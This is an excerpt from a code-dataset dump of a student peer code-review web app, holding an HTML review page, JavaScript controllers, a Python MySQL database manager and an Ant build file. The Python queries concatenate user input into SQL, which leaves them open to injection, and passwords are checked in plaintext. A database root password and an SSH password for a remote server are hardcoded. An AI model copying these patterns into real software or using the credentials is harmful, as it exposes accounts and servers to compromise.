"text": "<!DOCTYPE html>\n<html>\n<head>\n<link rel=\"stylesheet\" href=\"code-view.css\">\n</head>\n\n<body>\n\n<div class=\"box-left\" id=\"code-box\">\n<div id=\"file-select\">\n</div>\n<pre id=\"precode-area\" class=\"line-numbers\">\n<code id=\"code-review\" class=\"language-cpp\"></code>\n</pre>\n</div>\n\n<div class=\"box-right\" id=\"comment-box\">\n<div id=\"code-view-instructions\">\n<p>Click a filename to read it. Click a code element to create an issue or add comment (review mode). Click that code element again to remove it. Hovering over a sub-category will prompt the rule for it.</p>\n</div>\n\n\n\n\n<table id=\"review-data-table\">\n<tr>\n<th>Location</th>\n<th>Type</th>\n<th>Content</th>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n</table>\n<div id=\"submit-review-div\">\n <button id=\"submit-review\" style=\"left: 37%; position: relative;\">Submit Review!</button>\n</div>\n\n</div>\n\n\n\n\n<!-- Side Modal with work to review -->\n<div id=\"code-review-side-modal\" class=\"sidenav\">\n <a href=\"javascript:void(0)\" class=\"closebtn\" id=\"code-review-side-modal-close\">×</a>\n <fieldset class=\"code-review-sidenav-fieldset\">\n <legend class=\"code-review-sidenav-legend\">What do you want to do?</legend>\n\n <div id=\"code-review-sidenav-choice-left\">Add a comment</div>\n <div id=\"code-review-sidenav-choice-right\">State the issue</div>\n\n </fieldset>\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-comment\">\n <legend class=\"code-review-sidenav-legend\">Please type your comment below</legend>\n <input type=\"textbox\" id=\"code-review-sidenav-comment-textbox\">\n\n <button id=\"submit-comment\" style=\"left: 37%; position: relative;\">Submit Comment</button>\n </fieldset>\n\n\n\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-issue-category\">\n <legend class=\"code-review-sidenav-legend\">Select the category of the issue</legend>\n <div id=\"code-review-category-select-div\">\n\n </div>\n\n </fieldset>\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-issue-subcategory\">\n <legend class=\"code-review-sidenav-legend\">Select the sub-category of the issue</legend>\n <div id=\"code-review-subcategory-select-div\">\n\n </div>\n\n </fieldset>\n\n\n\n\n\n</div>\n\n\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.6784185171127319,
"alphanum_fraction": 0.6806849837303162,
"avg_line_length": 22.358823776245117,
"blob_id": "155b302596e7260b2f4479433b88a5f58eeaa92f",
"content_id": "bf03c062091a5f5487b996d0ba97148e86d1aaf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3971,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 170,
"path": "/views/assignments-student/AssignmentsStudentController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class AssignmentsStudentController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t\tthis.filesParsed = {};\n\t}\n\n\tsetup()\n\t{\n\t\tvar controller = this;\n\t\n\t\tconsole.log(this.model);\n\t}\n\n\tcreateSubmitAssignmentModal(id)\n\t{\n\t\tvar controller = this;\n\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"submit-assignment\");\n\t\tvar modalData = app.uiFactory.createModal(\"add-assignment\", \"Submit Assignment\", modalBody, true);\n\t\tdocument.body.appendChild(modalData.modal);\n\t\tmodalData.modal.style.display = \"block\";\n\n\t\t// Find assignment\n\t\tvar assignment = undefined;\n\t\tfor (var i = 0; i < this.model.assignments.length; i++)\n\t\t{\n\t\t\tif( this.model.assignments[i].id === id)\n\t\t\t{\n\t\t\t\tassignment = this.model.assignments[i] ;\n\t\t\t}\n\n\t\t}\n\n\t\t// Description in modal.\n\t\tdocument.getElementById(\"assignment-description\").innerText = \"Description: \" + assignment.description;\n\t\tdocument.getElementById(\"assignment-deadline\").innerHTML = \"Deadline: \" + assignment.deadlineDate + \" \" + assignment.deadlineTime;\n\n\n\t\t// Adds logic to the filedrop area.\n\t\tthis.prepareFiledropArea();\n\n\n\t\tvar submitBtn = modalData.submit;\n\t\tsubmitBtn.addEventListener(\"click\", function ()\n\t\t{\n\t\t\tcontroller.submitAssignment(id);\n\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\tparentNode.removeChild(modalData.modal);\n\n });\n\n\t}\n\n\tsubmitAssignment(assignmentID)\n\t{\n\t\tthis.model.submitAssignment(assignmentID, this.filesParsed);\n\t\tthis.filesParsed = {};\n\t}\n\n\tupdate()\n\t{\n\n\t}\n\n\tuploadFile(name, content){\n\t\tthis.filesParsed[name] = content;\n\t\tthis.updateModal();\n\t}\n\n\tdeleteFile(name){\n\t\tdelete this.filesParsed[name];\n\t\tthis.updateModal();\n\n\t}\n\n\tupdateModal(){\n\t\tvar controller = this;\n\t\tvar filesLoadedDiv = document.getElementById(\"files-loaded\");\n\t\tfilesLoadedDiv.innerHTML = \"\";\n\n\t\tfor (var key in this.filesParsed)\n\t\t{\n\n\t\t\tvar fileDiv = document.createElement(\"div\");\n\t\t\tfileDiv.className = \"file-uploaded-box\";\n\n\n\t\t\tvar deleteSpan = document.createElement(\"SPAN\");\n\t\t\tdeleteSpan.innerHTML = \"✖ \";\n\t\t\tdeleteSpan.id = \"delete-file#\" + key;\n\t\t\tdeleteSpan.addEventListener(\"click\", function()\n\t\t\t{\n\t\t\t\tcontroller.deleteFile(this.id.split(\"#\")[1]);\n\t\t\t});\n\n\t\t\tfileDiv.appendChild(deleteSpan);\n\n\t\t\tvar nameSpan = document.createElement(\"SPAN\");\n\t\t\tnameSpan.innerHTML = key;\n\t\t\tfileDiv.appendChild(nameSpan);\n\n\t\t\tfilesLoadedDiv.appendChild(fileDiv);\n\t\t\tfilesLoadedDiv.appendChild(document.createElement(\"BR\"));\n\n\t\t}\n\t}\n\n\n\tprepareFiledropArea()\n\t{\n\t\tvar controller = this;\n\n\t\tvar fileselect = document.getElementById(\"file-select\");\n\t\tvar\tfiledrag = document.getElementById(\"file-drag\");\n\t\tvar submitbutton = document.getElementById(\"submit-button\");\n\n\n\t\tvar fileDragHover = function(e) {\n\t\t\te.stopPropagation();\n\t\t\te.preventDefault();\n\t\t\te.target.className = (e.type === \"dragover\" ? 
\"hover\" : \"\");\n\t\t};\n\n\n\t\tvar fileSelectHandler = function (e) {\n\t\t\tfileDragHover(e);\n\t\t\tvar files = e.target.files || e.dataTransfer.files;\n\t\t\tfor (var i = 0, f; f = files[i]; i++)\n\t\t\t{\n\t\t\t\tparseFile(f);\n\t\t\t}\n\t\t};\n\n\t\t// output file information\n\t\tvar parseFile = function parseFile(file) {\n\t\t\tvar fileFormat = file.name.split(\".\")[1];\n\t\t\tif (fileFormat === \"cpp\" || fileFormat === \"h\") {\n\t\t\t\tvar reader = new FileReader();\n\t\t\t\treader.onload = function(e) {\n\t\t\t\t\tcontroller.uploadFile(file.name, reader.result);\n\t\t\t\t};\n\t\t\t\treader.readAsText(file);\n\t\t\t\tdocument.getElementById(\"messages\").innerHTML = \"\"\n\t\t\t}\n\t\t\telse {\n\t\t\t\tdocument.getElementById(\"messages\").innerHTML = \"Failed to load file \" + file.name + \".<br>\"\n\t\t\t}\n\t\t};\n\n\n\t\t// file select\n\t\tfileselect.addEventListener(\"change\", fileSelectHandler, false);\n\n\t\tvar xhr = new XMLHttpRequest();\n\t\tif (xhr.upload)\n\t\t{\n\t\t\t// file drop\n\t\t\tfiledrag.addEventListener(\"dragover\", fileDragHover, false);\n\t\t\tfiledrag.addEventListener(\"dragleave\", fileDragHover, false);\n\t\t\tfiledrag.addEventListener(\"drop\", fileSelectHandler, false);\n\t\t\tfiledrag.style.display = \"block\";\n\n\t\t\t// remove submit button\n\t\t\tsubmitbutton.style.display = \"none\";\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.5723541975021362,
"alphanum_fraction": 0.5723541975021362,
"avg_line_length": 23.36842155456543,
"blob_id": "287db29a9366b60dc9f8508247ccfea0719c62c0",
"content_id": "f4910aa1d61eed14d967a36401799dbaf78ca7d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 926,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 38,
"path": "/js/Submission.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Submission\n{\n constructor(data)\n {\n this.id = data.id;\n this.userID = data.user_id;\n this.assignmentID = data.assignment_id;\n this.submissionData = data.submission_data;\n this.isComplete = data.is_complete;\n this.iteration = data.iteration;\n this.reviewersIDs = data.reviewers_ids;\n this.feedbacks = data.feedbacks;\n\n this.userData = {};\n if(data.user_data)\n {\n this.userData = data.user_data;\n }\n\n }\n\n serialize()\n {\n var data = {};\n\n data.id = this.id;\n data.user_id = this.userID;\n data.assignment_id = this.assignmentID;\n data.submission_data = this.submissionData;\n data.is_complete = this.isComplete;\n data.iteration = this.iteration;\n data.reviewers_ids = this.reviewersIDs;\n data.feedbacks = this.feedbacks;\n\n return data;\n\n }\n}\n"
},
{
"alpha_fraction": 0.7065868377685547,
"alphanum_fraction": 0.7065868377685547,
"avg_line_length": 22.19444465637207,
"blob_id": "c70b3777bcefa7ac113894908f56c3c95703b12f",
"content_id": "6087ff01a8ad24af4f5b9cf26841148ba2375ad1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 36,
"path": "/views/signin/SigninController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Controller for sign in**/\nclass SigninController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\n\t\tvar signinButton = document.getElementById(\"signin-button\");\n\t\tsigninButton.addEventListener(\"click\", function(){that.signin()} );\n\n\t\tvar signupButton = document.getElementById(\"signup-link\");\n\t\tsignupButton.addEventListener(\"click\", function(){app.viewManager.goToView(\"signup\");} );\n\n\t\t//Design idea\n\t\t// bindClickFunction(signupButton, function(){app.viewManager.goToView(\"signup\");} );\n\n\t}\n\n\tsignin(e)\n\t{\n\t\tvar email = document.getElementById(\"signin-email\").value;\n \tvar password = document.getElementById(\"signin-password\").value;\n \tthis.model.signin(email,password);\n\t}\n\n\tshowError(errMessage)\n\t{\n\t\tdocument.getElementById(\"signin-error\").innerHTML = errMessage;\n\t}\n}\n"
},
{
"alpha_fraction": 0.6769846081733704,
"alphanum_fraction": 0.6795023679733276,
"avg_line_length": 23.375452041625977,
"blob_id": "e01a8e8e407917464716c2daed1ea2e7cd63c971",
"content_id": "21106630645c4617138fe061872dda662a6ea44b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6752,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 277,
"path": "/py/database_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import time\nimport traceback\nimport json\nfrom mysql.connector.pooling import MySQLConnectionPool\nfrom mysql.connector import errorcode\n\n\nclass DatabaseManager:\n\n\tdef __init__(self):\n\t\tprint(\"DatabaseManager: __init__\")\n\t\tself.createConnectionPool()\n\n\tdef createConnectionPool(self):\n\t\tdbconfig = {\n\t\t\"user\": \"root\",\n\t\t\"password\":\"xboxorpc7\",\n\t\t\"host\":'mihass-g-mysql', #set host to mysql using docker run link\n\t\t\"database\":'ProjectOrganiser',\n\t\t\"port\":'3306'\n\t\t}\n\n\t\ttry:\n\t\t\tself.cnxpool = MySQLConnectionPool(\n\t\t\t\tpool_name = \"mypool\",\n\t\t\t\tpool_size = 32,\n\t\t\t\t**dbconfig)\n\t\texcept:\n\t\t\t# sleep - hopefully will help - might be that the MySQL\n\t\t\t#container is not up and running yet\n\t\t\tprint(\"Exception... sleeping for 5 seconds then retry\")\n\t\t\ttb = traceback.format_exc()\n\t\t\tprint(\"tb: \" + tb)\n\t\t\ttime.sleep(5)\n\t\t\t# try again\n\t\t\treturn self.createConnectionPool()\n\n\tdef insert_into_table(self, table_name, my_dict):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tplaceholders = \", \".join([\"%s\"] * len(my_dict))\n\n\t\tstmt = \"INSERT INTO `{table}` ({columns}) VALUES ({values});\".format(\n\t\t\ttable=table_name,\n\t\t\tcolumns=\",\".join(my_dict.keys()),\n\t\t\tvalues=placeholders\n\t\t)\n\n\n\t\tcursor.execute(stmt, list(my_dict.values()))\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\t\tprint(\"complete\")\n\n\tdef update_table(self, table_name, tracker_arr):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor()\n\t\tstmt = \"\"\n\n\t\tfor i in tracker_arr:\n\t\t\tstmt = \"UPDATE `{table}` SET {column} = CONCAT(ifnull({column},'{value}'), '{value}') WHERE {field} = '{conditional}';\".format(\n\t\t\t\ttable=table_name,\n\t\t\t\tcolumn=\"logs\",\n\t\t\t\tvalue=json.dumps(i),\n\t\t\t\tfield=\"email\",\n\t\t\t\tconditional=i[\"userID\"]\n\t\t\t)\n\n\t\t\tcursor.execute(stmt)\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\t\tprint(\"table updated\")\n\n\n\tdef replace_into_table(self, table_name, my_dict):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tplaceholders = \", \".join([\"%s\"] * len(my_dict))\n\n\t\tstmt = \"REPLACE INTO `{table}` ({columns}) VALUES ({values});\".format(\n\t\t\ttable=table_name,\n\t\t\tcolumns=\",\".join(my_dict.keys()),\n\t\t\tvalues=placeholders\n\t\t)\n\n\n\t\tcursor.execute(stmt, list(my_dict.values()))\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\tdef select_all_from_table(self, table_name):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = \"SELECT * FROM `\"+table_name+\"`;\"\n\n\t\t#print(stmt)\n\t\tcursor.execute(stmt)\n\t\tdata = cursor.fetchall()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\treturn data\n\n\n\tdef delete_assignment(self, id):\n\t\t#Inserts a dictionary into table table_name\n\t\t#print(\"delete assignment\")\n\t\tid = str(id)\n\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = (\"DELETE FROM Assignments WHERE Assignments.id=\"+ id +\" LIMIT 1\")\n\t\t#print(stmt)\n\n\t\tcursor.execute(stmt)\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\tdef delete_user(self, email):\n\t\t#Inserts a dictionary into table table_name\n\t\t#print(\"delete user\")\n\t\tconnector = 
self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = (\"DELETE FROM Users WHERE Users.email='\"+email+\"' LIMIT 1\")\n\t\t#print(\"stmt:\")\n\t\t#print(stmt)\n\t\tcursor.execute(stmt)\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\tdef check_password(self, email, password):\n\t\t#return true if successful\n\t\t#print(\"check_password\")\n\t\tresult = False\n\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tquery = (\"SELECT * FROM Users WHERE Users.email='\"+email+\"' AND Users.password='\"+password+\"'\")\n\t\t#print(\"query:\")\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tcursor.fetchall()\n\n\t\tif cursor.rowcount == 1:\n\t\t\tresult = True\n\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\treturn result\n\n\tdef get_user_info(self, message_data):\n\t\t#print (\"get_user_data\")\n\t\temail = message_data[\"email\"]\n\t\tprint(\"0\")\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Users WHERE Users.email='\"+email+\"'\")\n\t\tprint(\"1\")\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tdatas = cursor.fetchall()\n\t\tdata = datas[0]\n\n\t\tcursor.close()\n\t\tconnector.close()\n\t\treturn data\n\n\tdef get_all_users(self):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Users\")\n\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tusers_table = cursor.fetchall()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\t#sort it\n\t\tusers = []\n\t\tfor user_table in users_table:\n\t\t\tuser = {}\n\t\t\tuser[\"email\"] = user_table[\"email\"]\n\t\t\tuser[\"name\"] = user_table[\"name\"]\n\t\t\tuser[\"surname\"] = user_table[\"surname\"]\n\t\t\tusers.append(user)\n\n\t\treturn users\n\n\tdef select_submissions_for_user(self, user_id):\n\t\tprint(\"select_submissions_from_assignments\")\n\t\tuser_id = str(user_id)\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.user_id=\" + user_id )\n\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tdata = cursor.fetchall()\n\n\t\tcursor.close()\n\t\tconnector.close()\n\t\treturn data\n\n\n\tdef add_review(self, data):\n\t\tprint(\"add_review\")\n\t\tconnector = self.cnxpool.get_connection()\n\n\t\t# first we need to get the submission\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tsubmission_id = str(data[\"submission_id\"])\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.id=\" + submission_id)\n\t\tcursor.execute(query)\n\t\tsubmission = cursor.fetchall()[0]\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\tfeedbacks.append(data)\n\t\tsubmission[\"feedbacks\"] = json.dumps(feedbacks)\n\n\t\tself.replace_into_table(\"Submissions\", submission)\n\n\n\n\n\tdef update_review(self, data):\n\t\tprint(\"update_review\")\n\t\tconnector = self.cnxpool.get_connection()\n\n\t\t# first we need to get the submission\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tsubmission_id = str(data[\"submission_id\"])\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.id=\" + submission_id)\n\t\tcursor.execute(query)\n\t\tsubmission = cursor.fetchall()[0]\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\n\t\tfor i in range(0,len(feedbacks)):\n\t\t\tif 
feedbacks[i][\"reviewer_id\"] == data[\"reviewer_id\"]:\n\t\t\t\tif feedbacks[i][\"iteration_submitted\"] == data[\"iteration_submitted\"]:\n\t\t\t\t\t#print(\"FEEDback old:\", feedbacks[i])\n\t\t\t\t\tprint(\"FEEDback new:\", data[\"review\"])\n\t\t\t\t\tfeedbacks[i][\"review\"] = data[\"review\"] #TEST THIS PLACE\n\t\t\t\t\tprint(\"WHY\", feedbacks[i][\"review\"])\n\n\t\tsubmission[\"feedbacks\"] = json.dumps(feedbacks)\n\t\tprint (\"RESULT:\", submission[\"feedbacks\"])\n\n\t\tself.replace_into_table(\"Submissions\", submission)\n"
},
{
"alpha_fraction": 0.6493439674377441,
"alphanum_fraction": 0.6547465920448303,
"avg_line_length": 23.764331817626953,
"blob_id": "a26e07d9ca8e2835fc976aad886e16cd6e21217d",
"content_id": "e95fbe789653b4dce1837411c1a23c135e0d3c00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ant Build System",
"length_bytes": 3887,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 157,
"path": "/build.xml",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "<?xml version=\"1.0\"?>\n<project name=\"ProjectOrganiser\">\n\t<property name=\"ip\" value=\"gamecore.itcarlow.ie\"/>\n\n\n\t<target name=\"create_database\">\n\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"build_and_run\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"down\"/>\n\t</exec>\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"build\"/>\n\t</exec>\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"build_base_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"build\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/BaseServerDockerfile\"/>\n\t\t<arg value=\".\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"build_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"build\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Run all unit tests-->\n\t<target name=\"unit_tests\">\n\t<exec executable=\"python3\">\n\t\t<arg value=\"tests/test_signup.py\"/>\n\t\t<arg value=\"tests/test_signin.py\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--run all selenium tests-->\n\t<target name=\"selenium_tests\">\n\t<exec executable=\"python3\">\n\t\t<arg value=\"tests/testbot.py\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run_fast\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"docker-compose-apache-python-only.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run_mysql\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"docker-compose-mysql-only.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"run_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"stop\"/>\n\t\t<arg value=\"server\"/>\n\t</exec>\n\t<exec executable=\"docker\">\n\t\t<arg value=\"rm\"/>\n\t\t<arg value=\"server\"/>\n\t</exec>\n\t<exec executable=\"docker\">\n\t\t<arg value=\"run\"/>\n\t\t<arg value=\"--name\"/>\n\t\t<arg value=\"server\"/>\n\t\t<arg value=\"--link\"/>\n\t\t<arg value=\"ProjectOrganiser_mysql_1:mysql\"/>\n\t\t<arg value=\"--net\"/>\n\t\t<arg value=\"ProjectOrganiser_default\"/>\n\t\t<arg value=\"-p\"/>\n\t\t<arg value=\"8080:8080\"/>\n\t\t<arg value=\"-d\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t</exec>\n\t</target>\n\n\n\t<target name=\"gamecore-build\">\n\t\t<!--<input message=\"Enter github username:\" addproperty=\"username\" />\n\t\t<input message=\"secure-input:\" addproperty=\"password\">\n\t <handler classname=\"org.apache.tools.ant.input.SecureInputHandler\" />\n\t\t</input>-->\n\t\t<taskdef name=\"sshexec\" classname=\"org.apache.tools.ant.taskdefs.optional.ssh.SSHExec\" classpath=\"lib/jsch-0.1.50.jar\" />\n\t\t<sshexec 
host=\"${ip}\"\n\t\t\tusername=\"gamecore\"\n\t\t\ttrust=\"true\"\n\t\t\tpassword=\"j01nin17.\"\n\t\t\tcommand=\"\n\t\t\t(cd MihassGamifiedMasterProject; sudo rm build.xml);\n\t\t\t(cd MihassGamifiedMasterProject; sudo git pull https://github.com/ITCOnlineGaming/MihassGamifiedMasterProject.git);\n\t\t\t(cd MihassGamifiedMasterProject; sudo git checkout test_branch);\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml build);\"\n\n\t\t/>\n\t</target>\n\n\n\t<target name=\"run\">\n\t\t<taskdef name=\"sshexec\" classname=\"org.apache.tools.ant.taskdefs.optional.ssh.SSHExec\" classpath=\"lib/jsch-0.1.50.jar\" />\n\t\t<sshexec host=\"${ip}\"\n\t\t\tusername=\"gamecore\"\n\t\t\ttrust=\"true\"\n\t\t\tpassword=\"j01nin17.\"\n\t\t\tcommand=\"\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml down);\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml up -d);\"\n\t\t/>\n\t</target>\n</project>"
},
{
"alpha_fraction": 0.6586757898330688,
"alphanum_fraction": 0.6598173379898071,
"avg_line_length": 16.176469802856445,
"blob_id": "f5101949a95a8a1816d93aa263f5394768df5f3f",
"content_id": "160d9bce43f253e4cfb3d089e0f307543be694ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 876,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 51,
"path": "/views/see-standards-teacher/SeeStandardsTeacherController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class SeeStandardsTeacherController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\t\tconsole.log(this.model);\n\n\t\t//pressing the button will call for an upload window for CVS.\n\t\tvar addStandards = document.getElementById(\"add-standards\");\n\t\tvar fileLoad = document.getElementById(\"standards-html-file\");\n\n\t\taddStandards.addEventListener(\"click\", function(){fileLoad.click();} );\n\t\tfileLoad.addEventListener(\"change\", function(){that.addStandard();});\n\t}\n\n\n\n\n\n\taddStandard()\n\t{\n\t\tvar that = this;\n\n\t\tvar file = document.getElementById(\"standards-html-file\").files[0];\n\t\tvar data = [];\n\n\t\tvar reader = new FileReader();\n \treader.onload = function()\n\t\t{\n\n \t\tvar file = reader.result;\n\n\t\t\tconsole.log(\"Read HTML: \", file);\n \t\tthat.model.pushStandards(file);\n \t};\n \treader.readAsText(file);\n\t}\n\n\n\n\tupdate()\n\t{\n\n\t}\n}\n"
},
{
"alpha_fraction": 0.6497747898101807,
"alphanum_fraction": 0.6559684872627258,
"avg_line_length": 22.0649356842041,
"blob_id": "1a7ba404e4304c9c35f0304b7e9389e9f67d7874",
"content_id": "325997ebf9a9c0574ff0de0718402ec6b8e7dfa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1776,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 77,
"path": "/views/see-submissions-student/SeeSubmissionsStudentView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass SeeSubmissionsStudentView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SEE_SUBMISSIONS_STUDENT;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.SUBMIT_ASSIGNMENT_SUCCESSFUL)\n\t\t{\n\t\t\tvar submissionsTable = document.getElementById(\"student-submissions-table\");\n\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = submissionsTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tsubmissionsTable.deleteRow(rowCount);\n\t\t\t}\n\n\t\t\tvar allSubmissions = model.submissions;\n\t\t\tvar submissions = [];\n\t\t\tfor (var i = 0; i < allSubmissions.length; i++)\n\t\t\t{\n\t\t\t\tif (allSubmissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\tsubmissions.push(allSubmissions[i]);\n\t\t\t\t}\n\t\t\t}\n\n\n\n\t\t\tvar assignments = app.assignments.assignments;\n\n\t\t\tfor (var i = 0; i < submissions.length; i++)\n\t\t\t{\n\t\t\t\tvar row = submissionsTable.insertRow(i + 1);\n\n\t\t\t\tvar name = \"\";\n\n\t\t\t\tfor (var j = 0; j < assignments.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (assignments[j].id === submissions[i].assignmentID){\n\t\t\t\t\t\tname = assignments[j].name;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tcell0.innerHTML = name;\n\t\t\t\tcell0.id = \"see-submission-student#\" + submissions[i].id;\n\t\t\t\tcell0.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tapp.submissions.codeViewState = \"Clear\";\n\t\t\t\t\tapp.submissions.submissionIDToCodeView = parseInt(this.id.split('#')[1]);\n\t\t\t\t\tapp.submissions.reviewerIDToCodeView = -1;\n\n\t\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\t});\n\t\t\t}\n\t\t}\n\t}\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
}
] | 41 |
